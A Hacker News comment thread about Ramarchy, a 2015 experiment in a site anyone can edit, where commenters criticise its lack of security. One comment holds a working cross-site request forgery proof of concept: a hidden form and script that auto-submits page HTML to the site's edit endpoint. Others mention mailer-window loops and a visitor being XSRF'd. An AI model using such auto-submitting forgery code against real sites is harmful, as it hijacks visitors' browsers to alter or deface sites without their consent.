Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
Ramarchy – a website anyone can edit (ramarchy.com)
12 points by zq on March 28, 2015 | hide | past | favorite | 10 comments



I would caution those with epilepsy to avoid the main page. It's being changed fairly regularly to a very quickly flashing background of multiple colors and flashing text.


You should probably do something to prefent CSRF. I just came up with this:

    <form id="lol" method="POST" action="http://edit.ramarchy.com/">
      <input type="hidden" name="route" value="/" />
      <input id="page" type="hidden" name="page" value="" />
      </form>
    <script>
    setTimeout(function() {
      document.getElementById('page').value = '<ht' + 'ml>' + document.documentElement.innerHTML + '</ht' + 'ml>';
      document.getElementById("lol").submit();
    }, 1000);
    </script>


At least put some basic protection in place. There was a time when you could have launched this website without a problem, say 1995 or so. Today this is no longer possible.

To the dumbass downvoting me: I just took a look with wget and the current homepage will set you in a loop that starts up endless mailer windows until your machine crashes. Good luck.


It looks like it intentionally didn't have any protections in place. The edit page has the comment <!-- Feel free to take advantage of the lack of CSRF protection -->

It also has <h1>What could possibly go wrong.</h1> go wrong in the default editor source.

Was it irresponsible? Yes zq should have put a warning for sure. Still a cool experiment. Twitch Plays Pokemon with bigger repercussions.


Seems like someone who uses LastPass got XSRF'd: view-source:http://ramarchy.com/


The source has changed since your post. If I use LastPass and visited the site, should I be worried? What did the script do?


The script grabbed document.documentElement.innerHTML and resubmitted it as the new page contents. See my post above regarding CSRF.


This will be fun until 4chan/8chan find it.


Ha yeah. It is an expriment I'm wondering how long it will last before someone drops a XSRF or something. Will probably have to take it down within the hour. I'm thinking about only letting users posts go through if their hash is lower than the previous users hash submission.

Hopefully it is lega.


I'm not worried about you getting in trouble, I'm worried about those that visit your site.

Shut it down until you understand the basics of operating a site that 'anyone can edit', fix the problems and then re-launch. This is simply asking for misery, and not just yours.




Consider applying for YC's Fall 2025 batch! Applications are open till Aug 4

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: